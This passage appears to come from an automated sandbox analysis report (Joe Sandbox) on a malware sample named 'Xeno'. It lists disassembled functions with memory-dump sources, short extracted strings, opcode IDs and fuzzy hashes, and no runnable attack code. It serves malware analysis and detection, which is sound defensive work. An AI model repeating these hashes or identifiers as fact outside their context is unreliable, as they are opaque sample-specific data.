                            Function 0041B588 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Dj 6$xj 6$TZ
                            • API String ID: 0-3647110430
                            • Opcode ID: 49f3aea8cf22f3d8992e851adeb2b8286ecbcb7481062874cd26e18624d557bd
                            • Instruction ID: 9565bb60ada243023f45df5d5459273736da917ad741ec0fea6f9f997e26b79d
                            • Opcode Fuzzy Hash: 49f3aea8cf22f3d8992e851adeb2b8286ecbcb7481062874cd26e18624d557bd
                            • Instruction Fuzzy Hash: 7151EFB160C3609BD7209F25D81166BBBF1EFDA318F18895DE4D54B391E3398901CB8B
                            Function 00433539 Relevance: 3.9, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$.$K
                            • API String ID: 0-4278605028
                            • Opcode ID: 4814c4e0a18d5f91a188e00bbfd94b8d470bec3eb64053db4bd1cde425b39007
                            • Instruction ID: 18cd5467b6d47afcda196380cdd8e9db46cfe15a55f318c2accd4e50a7af4828
                            • Opcode Fuzzy Hash: 4814c4e0a18d5f91a188e00bbfd94b8d470bec3eb64053db4bd1cde425b39007
                            • Instruction Fuzzy Hash: 6D51007050D3C08BD36A873994607ABBFE16F96304F184E6EE1E747392CA698245CB57
                            Function 00404B40 Relevance: 3.3, Strings: 2, Instructions: 792COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$8
                            • API String ID: 0-46163386
                            • Opcode ID: fc36de11d7acb18c79bfa19ae9b6979b7893688525030db6cb1e95aed024fa94
                            • Instruction ID: 7197625b11bac423ad23b6a4f358e90d8c28833f2930a027053b107a40c6ca91
                            • Opcode Fuzzy Hash: fc36de11d7acb18c79bfa19ae9b6979b7893688525030db6cb1e95aed024fa94
                            • Instruction Fuzzy Hash: 12722371508340AFD714CF18C884BABBBE1BF88314F04892EF9999B391D779D958CB96
                            Function 0043B370 Relevance: 3.2, Strings: 2, Instructions: 716COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: <=$E
                            • API String ID: 0-1774780486
                            • Opcode ID: 81bab8f63a0c46f66f0d3fd221322a1e9c90d1edcf5bdeac7fbb6f6a68ae1596
                            • Instruction ID: c37952f61dcd2cdc74209d2ec3eb9f0b33311c0495ad4ce3caea392dc4c2e7bb
                            • Opcode Fuzzy Hash: 81bab8f63a0c46f66f0d3fd221322a1e9c90d1edcf5bdeac7fbb6f6a68ae1596
                            • Instruction Fuzzy Hash: AF221136518315CBD7189F28E8923ABB3E2FF99300F0AD83DD98587391E7799944C746
                            Function 00413FF0 Relevance: 3.0, Strings: 2, Instructions: 503COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: GCA$NP,?
                            • API String ID: 0-1543269465
                            • Opcode ID: 2be00618527785d4e33da7150d28a8cfa5933b3d63f06e0c5ba8f6ced1d8bdf2
                            • Instruction ID: a0862f6a63456e9e6b23b14fa2e6b23474a0e5f3fe38dc22a47ef80134351fd0
                            • Opcode Fuzzy Hash: 2be00618527785d4e33da7150d28a8cfa5933b3d63f06e0c5ba8f6ced1d8bdf2
                            • Instruction Fuzzy Hash: A9E121B8214200EFE7148F15EC41B6B73A1FBCA329F144A2DF599572E1D739AC91CB49
                            Function 0041F5C0 Relevance: 3.0, Strings: 2, Instructions: 456COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: EEFG$q;
                            • API String ID: 0-1599080334
                            • Opcode ID: 29556f3e094b972c0239b34301c3d4ef565ccae3cd6b535a51a9f414f61ad031
                            • Instruction ID: 28bf1a67f820df0091446aafb65e6e37692207d9442259d2e0f34fe107c18eb1
                            • Opcode Fuzzy Hash: 29556f3e094b972c0239b34301c3d4ef565ccae3cd6b535a51a9f414f61ad031
                            • Instruction Fuzzy Hash: 6AC134B15183108BC724DF28C8917ABB7F1FF92354F188A2DE5D54B3A0E7789846CB96
                            Function 004145E0 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: PKA$gKA
                            • API String ID: 0-3458973595
                            • Opcode ID: 122b4ccff0ef283a645d78e9cc8c6f7b365c0673ce676b3999daa562c221dc9e
                            • Instruction ID: 5196666aa9b314b536e5a3064005e8d0b0ebf2aaa6e22db81686803c1f092df5
                            • Opcode Fuzzy Hash: 122b4ccff0ef283a645d78e9cc8c6f7b365c0673ce676b3999daa562c221dc9e
                            • Instruction Fuzzy Hash: 27D169B5609300DFD7249F24D8917AB73A1FFC6364F04862DE4958B3A1EB789841C79B
                            Function 00409000 Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 94$^^\S
                            • API String ID: 0-2728499901
                            • Opcode ID: 00a93db577abf90da65751e3af12115cbb9cfdedb4c8579be2347975681bf90a
                            • Instruction ID: 105de99c08bdbff08113f1d2c39399fb31abda8af8dfa5bee4ee88022bf6ea35
                            • Opcode Fuzzy Hash: 00a93db577abf90da65751e3af12115cbb9cfdedb4c8579be2347975681bf90a
                            • Instruction Fuzzy Hash: 98A1037124C3815BD3168F7994A076BFFE19F97304F0849BDE4D59B382C239890AC75A
                            Function 00404210 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: )$IEND
                            • API String ID: 0-707183367
                            • Opcode ID: c1d4e1f2d27d79bd6e73e4f111654da6eea159fbd771e736c4c88191a55ab19c
                            • Instruction ID: 3deca869f47dbc6e1f2dd954d9342126f6a499d7f2618c59535dd5afa0287d26
                            • Opcode Fuzzy Hash: c1d4e1f2d27d79bd6e73e4f111654da6eea159fbd771e736c4c88191a55ab19c
                            • Instruction Fuzzy Hash: 65D1A3B1A083449FD710CF14D84575BBBE4AB94308F14492EFA99AB3C2D779E908CB97
                            Function 0041C110 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$V
                            • API String ID: 0-2831821285
                            • Opcode ID: c95eeef50b39d7aca81d468704dd7c23b175f4ef043a2f4d827d6a90ba8aa324
                            • Instruction ID: 02fb41d872a521f5660d48750de83f1acadc345e7b74cb2622ac1b31c9156c78
                            • Opcode Fuzzy Hash: c95eeef50b39d7aca81d468704dd7c23b175f4ef043a2f4d827d6a90ba8aa324
                            • Instruction Fuzzy Hash: D1916A32A8C7D447C31849BC5C553EA7E920BD2230F1CC37EE9B5873D2D56C8946938A
                            Function 0042D955 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: 2c4e8ad769910b0e2da5f010131ce9121b23f5140e23058c09ebdad6c18c3e3f
                            • Instruction ID: d8d3bf99ae2d4d757a7bf0e38792a605ca262b74009a69b878583df991406498
                            • Opcode Fuzzy Hash: 2c4e8ad769910b0e2da5f010131ce9121b23f5140e23058c09ebdad6c18c3e3f
                            • Instruction Fuzzy Hash: 015127A060C3928BE719CF39A07173B7FD19FD3705F24895EE0C297282C66CC90A875A
                            Function 0042D7C0 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: be7d70423d818604852b46b523abb94a2d669e98b312115888eb2af366895202
                            • Instruction ID: c04aa28caec7d6050f94680ade6de8178e81235f19a31a752b03d92c54447247
                            • Opcode Fuzzy Hash: be7d70423d818604852b46b523abb94a2d669e98b312115888eb2af366895202
                            • Instruction Fuzzy Hash: 1551056060C3928BE719CE39A47173B7FD19FD3705F24495EE4C29B382C66CC90A876A
                            Function 004197F0 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Ft$Ft
                            • API String ID: 0-816386971
                            • Opcode ID: 26557002a04958d360b7c086660a5e114be23b61f72cd9ecb2307eeea2ffc125
                            • Instruction ID: 9888aa4a110475c1d87c223a705ee45e8b96713c53b15abc4ae8fee1b961ea07
                            • Opcode Fuzzy Hash: 26557002a04958d360b7c086660a5e114be23b61f72cd9ecb2307eeea2ffc125
                            • Instruction Fuzzy Hash: 655133B15083918FD724DF25C4A16ABBBF4EF93744F08495DE4C19B351E378890ACB96
                            Function 0042D944 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: be366aa7ef4912d8ce9537d6d1916a0c76447426e2bbdead2f13f1ea346940a8
                            • Instruction ID: 79c2e9541493bc54a9d497453eec8b3057f6d7a7314f9701e2d9d32576e1f65d
                            • Opcode Fuzzy Hash: be366aa7ef4912d8ce9537d6d1916a0c76447426e2bbdead2f13f1ea346940a8
                            • Instruction Fuzzy Hash: 0551086060C3928BE715CF29A47177BBFD19FD3705F28495EE0C25B282D668850A87AA
                            Function 0042D91A Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: fbe9682165b494f0d6dc42cf9df35efa7ed02f8eadf4e66d95e7ff25ca12fb0c
                            • Instruction ID: e5380c79a96e78b6117fd63b3df3a9df5e27214a7769bd173fd312d3ca87ccf8
                            • Opcode Fuzzy Hash: fbe9682165b494f0d6dc42cf9df35efa7ed02f8eadf4e66d95e7ff25ca12fb0c
                            • Instruction Fuzzy Hash: 1E51F86060C3928BE715CF29A47177BBFD19FD3705F28495DE4C25B282D278850A87AB
                            Function 0042DFC3 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: N$VNRL
                            • API String ID: 0-3545530786
                            • Opcode ID: 8adbbb97136974072c05d9f31256350b89ec356d3b9f5b1e23735bab8db4d35d
                            • Instruction ID: d92eb9b8a73a99f7a89e8e6121f63dbf7f452b34976713005460d141eb761e01
                            • Opcode Fuzzy Hash: 8adbbb97136974072c05d9f31256350b89ec356d3b9f5b1e23735bab8db4d35d
                            • Instruction Fuzzy Hash: FA512B7260C3A18BD724CF3A98903ABFBD2AFD7310F198A6ED4D947391D77548068786
                            Function 00424513 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: G'I!$I+5U
                            • API String ID: 0-3982469033
                            • Opcode ID: a34cc5b98ecda74216b54885ebf6feacb799be7facf0d732b231c330b8b92638
                            • Instruction ID: 0c37e6b0bbb2cef1c6114b6db361c8c1cee858d25acd2bf1e4e1587d6e24da40
                            • Opcode Fuzzy Hash: a34cc5b98ecda74216b54885ebf6feacb799be7facf0d732b231c330b8b92638
                            • Instruction Fuzzy Hash: B33187B05083519BC314CF15D89162BBAF1EF82754F099A2DF4DA5B720E7788901CB4A
                            Function 00418376 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8230$8230
                            • API String ID: 0-3715803118
                            • Opcode ID: fd6fd82e7844b2da102b34223c046c7b7e0bee97ac1f011841723bb8ffc28060
                            • Instruction ID: 09e9332ac2f142cfff3c19cdd478bbb557e199818922e0d4294f9697a862ebd9
                            • Opcode Fuzzy Hash: fd6fd82e7844b2da102b34223c046c7b7e0bee97ac1f011841723bb8ffc28060
                            • Instruction Fuzzy Hash: 3F11053EF655608BE3188F29C4446ABA2D2D7DA311F1CD66D88DDA7259CE348C81838B
                            Function 00420DA0 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 30
                            • API String ID: 0-2473281379
                            • Opcode ID: 3cbe4532547ec514d44d5ff9ddce2b56253359cd7a5faa645c00dea0d8e88b53
                            • Instruction ID: 6bd67aa98bbdda8fa54e3a5750cb12a3b4a64e14cc2212a902c26c9a915805be
                            • Opcode Fuzzy Hash: 3cbe4532547ec514d44d5ff9ddce2b56253359cd7a5faa645c00dea0d8e88b53
                            • Instruction Fuzzy Hash: 9AB15B71B083608BD7209B24D852777B3E1EF95314F99582EE8C597391E7389C41C79B
                            Function 0042C080 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: "
                            • API String ID: 0-123907689
                            • Opcode ID: e1b3d67a2ada083b185932ce6c3139d6b3836433607128a7d61e5613d6f14c4e
                            • Instruction ID: 16abfbfe1406be8d20c5b1f6a82626de70634d18a4a41d1934c219b008ff2ba0
                            • Opcode Fuzzy Hash: e1b3d67a2ada083b185932ce6c3139d6b3836433607128a7d61e5613d6f14c4e
                            • Instruction Fuzzy Hash: 92D12272B083209FC714CE64A49076FB7E6AF84314F48896EE89987382D778ED44C7D6
                            Function 0043AC10 Relevance: 1.6, Strings: 1, Instructions: 381COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: NP,?
                            • API String ID: 2994545307-3110377521
                            • Opcode ID: cb5a79b8f325920f8d3cc8b971d8ce68c3d2610a66d1326b4a512886c66d31ee
                            • Instruction ID: b6f219711519e2a2136208b8bcef6077abda49d6ab366dcdc26f6a8fb8e34ae8
                            • Opcode Fuzzy Hash: cb5a79b8f325920f8d3cc8b971d8ce68c3d2610a66d1326b4a512886c66d31ee
                            • Instruction Fuzzy Hash: 2AA19A756443009BD3248F25D881A3BB397EBCD728F18A62EE5E5073D1D739AC12879B
                            Function 0041AD89 Relevance: 1.6, Strings: 1, Instructions: 351COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Sf?!
                            • API String ID: 0-2685530784
                            • Opcode ID: 4d31cdc7311a0b78a3ee511fbc4d4451a29a4530676fc4fcdad427d4bc59617e
                            • Instruction ID: 848e50da9f92a9d1f8bfdbd2d0439222b35ba032049198bd196cc30c99b35772
                            • Opcode Fuzzy Hash: 4d31cdc7311a0b78a3ee511fbc4d4451a29a4530676fc4fcdad427d4bc59617e
                            • Instruction Fuzzy Hash: E1815C715083108BC714CF28C8527ABB7F2EFD5324F09992DE8DA8B391E7389945C78A
                            Function 00408080 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4:;8
                            • API String ID: 0-1665238794
                            • Opcode ID: c5419bf167f590bb2c803b4fe472d2f441fb4a9b03cb45a7dceb0e463b4a8997
                            • Instruction ID: 4da589962028e2cc69ed1b5c9d1435f3dfe4c2b10e657c8f256301ff62b2b6f0
                            • Opcode Fuzzy Hash: c5419bf167f590bb2c803b4fe472d2f441fb4a9b03cb45a7dceb0e463b4a8997
                            • Instruction Fuzzy Hash: 00A15A319086218BC7118E19C94425BB7E2AFC1720F198B7ED8E46B3E5EA3DDC468BC5
                            Function 0041A9E5 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: L2
                            • API String ID: 0-186256184
                            • Opcode ID: 94fc44c7d09803d5477b02f2e267ad64020a13267048af0f0a7366688f6910ac
                            • Instruction ID: f21e2cd584cc592dd508e116751ca41a74858fba8db2b7a880d802e56d530856
                            • Opcode Fuzzy Hash: 94fc44c7d09803d5477b02f2e267ad64020a13267048af0f0a7366688f6910ac
                            • Instruction Fuzzy Hash: 4791017265C3449FC708DF59C8516AFFBE2EBC5304F48882DE4D59B312E6389609CB86
                            Function 00427CE5 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: r~B
                            • API String ID: 0-2170163688
                            • Opcode ID: ba2d9c57199d93cdf80e6d160f8ba6e92baa324358b6a12a53c820edea7c6dd9
                            • Instruction ID: 7166226e75b44e8eaf6fa294b05fbeada620e5489b3bbb3639eff6a45a4f7353
                            • Opcode Fuzzy Hash: ba2d9c57199d93cdf80e6d160f8ba6e92baa324358b6a12a53c820edea7c6dd9
                            • Instruction Fuzzy Hash: 4AA1083160C3A1CFD314CF28D89076AB7E2EF8B310F5A86ADE5954B2D1D735A904C756
                            Function 00441190 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: G%&
                            • API String ID: 0-1540628794
                            • Opcode ID: fce8dd7dccab4b402c4886d58539d4155c5646ba8475f29452c72e6e36abcb42
                            • Instruction ID: 872ea7cbef17f7592675314ca5cefede4d32ffa1df34d834cfe97dee4c58b2ee
                            • Opcode Fuzzy Hash: fce8dd7dccab4b402c4886d58539d4155c5646ba8475f29452c72e6e36abcb42
                            • Instruction Fuzzy Hash: 9A81F1342043069FE7149F68C880A6BB7E1EB89364F54862DF9958B3B1EB39DC91C749
                            Function 0041C5A0 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: cbc0efc6741f2f245a1ba22c5f7ff64902cbe2c94271421e483900c60b384df7
                            • Instruction ID: ec7cbc70f0158c2a01ee5ac80d324b442bc0a40f16a7f08a7b184a3fc104b2ac
                            • Opcode Fuzzy Hash: cbc0efc6741f2f245a1ba22c5f7ff64902cbe2c94271421e483900c60b384df7
                            • Instruction Fuzzy Hash: 38714932B897854BC31899BC5C812EEBA934BD7330F2CC3BAD9B1873E5D56849469349
                            Function 00419270 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: RP
                            • API String ID: 0-2004230831
                            • Opcode ID: 52b4266fadbcddcdf81c0e7e7e132d56fc8f8bff9a0980d5883735d9d6a7e08e
                            • Instruction ID: f2e06192cff92b9304cbddec49ab8680b7c3fe636ca01c469911e9ba8dd640b3
                            • Opcode Fuzzy Hash: 52b4266fadbcddcdf81c0e7e7e132d56fc8f8bff9a0980d5883735d9d6a7e08e
                            • Instruction Fuzzy Hash: 367117152145914ADB2CCF7588923377AD69F8470DF2881BFC955CFADBE938C2038749
                            Function 004273C0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: wt
                            • API String ID: 0-1993296107
                            • Opcode ID: 631aab08cac6b9f7680146f3f3af4b981a59ddf06376f59a6bd4bafadce0c253
                            • Instruction ID: 4a80c9fa56816353ffe6980b2ca108c691517d218e42b42e183a8e5cef874030
                            • Opcode Fuzzy Hash: 631aab08cac6b9f7680146f3f3af4b981a59ddf06376f59a6bd4bafadce0c253
                            • Instruction Fuzzy Hash: 1E41CBB054C3908BC3309F25A8017AFBBF0FB92348F50496DE4D9AB211D3398949CB9B
                            Function 00418281 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
